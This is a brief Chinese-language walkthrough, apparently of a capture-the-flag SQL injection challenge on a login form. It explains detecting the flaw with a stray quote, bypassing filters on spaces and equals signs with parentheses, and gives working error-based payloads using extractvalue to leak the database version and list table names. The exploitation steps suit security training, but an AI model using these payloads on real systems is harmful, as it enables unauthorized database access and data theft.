直接找注入,随便填写用户名密码,用户名处多加个引号,有报错
加个or 1 #
有过滤,抓个包fuzz一下
等号,空格等被过滤
发现可以用报错注入,空格可以用括号代替
username=admin'or(extractvalue(1,concat('0x7e',version())))%23
username=admin'or(extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like(database())))))%23